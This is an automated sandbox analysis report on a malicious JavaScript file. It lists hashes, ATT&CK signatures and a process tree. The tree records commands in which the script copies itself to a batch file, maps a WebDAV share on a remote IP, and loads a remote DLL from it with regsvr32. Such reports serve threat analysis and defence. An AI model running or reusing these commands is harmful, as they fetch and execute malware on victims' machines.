Analysis
max time kernel: 117s
max time network: 122s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 08/07/2024, 04:10
Static task: static1
Behavioral task: behavioral1
  Sample: 1850166781191324920.js
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: 1850166781191324920.js
  Resource: win10v2004-20240704-en
General
Target: 1850166781191324920.js
Size: 5KB
MD5: 33301c9fd5a47289e0eff7062eb98c94
SHA1: b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a
SHA256: 3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c
SHA512: 67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0
SSDEEP: 96:yfbvUIOO8hX7IOO8h8GoM/prtxJcqSGZTt6LWhJPNvhzALk8oOkP8o9:yPOO8SOO82m/Jtx7SGvtlSkP5
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid | Process
  2596 | regsvr32.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description | pid | Process | procid_target
  PID 2156 wrote to memory of 1736 | 2156 | wscript.exe | 30
  PID 2156 wrote to memory of 1736 | 2156 | wscript.exe | 30
  PID 2156 wrote to memory of 1736 | 2156 | wscript.exe | 30
  PID 1736 wrote to memory of 2248 | 1736 | cmd.exe | 32
  PID 1736 wrote to memory of 2248 | 1736 | cmd.exe | 32
  PID 1736 wrote to memory of 2248 | 1736 | cmd.exe | 32
  PID 1736 wrote to memory of 2596 | 1736 | cmd.exe | 33
  PID 1736 wrote to memory of 2596 | 1736 | cmd.exe | 33
  PID 1736 wrote to memory of 2596 | 1736 | cmd.exe | 33
  PID 1736 wrote to memory of 2596 | 1736 | cmd.exe | 33
  PID 1736 wrote to memory of 2596 | 1736 | cmd.exe | 33
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js
  PID: 2156
  Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js" "C:\Users\Admin\\fwauam.bat" && "C:\Users\Admin\\fwauam.bat"
    PID: 1736
    Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe
      net use \\45.9.74.13@8888\DavWWWRoot\
      PID: 2248
    - C:\Windows\system32\regsvr32.exe
      regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\895.dll
      PID: 2596
      Suspicious behavior: CmdExeWriteProcessMemorySpam
Network
MITRE ATT&CK Enterprise v15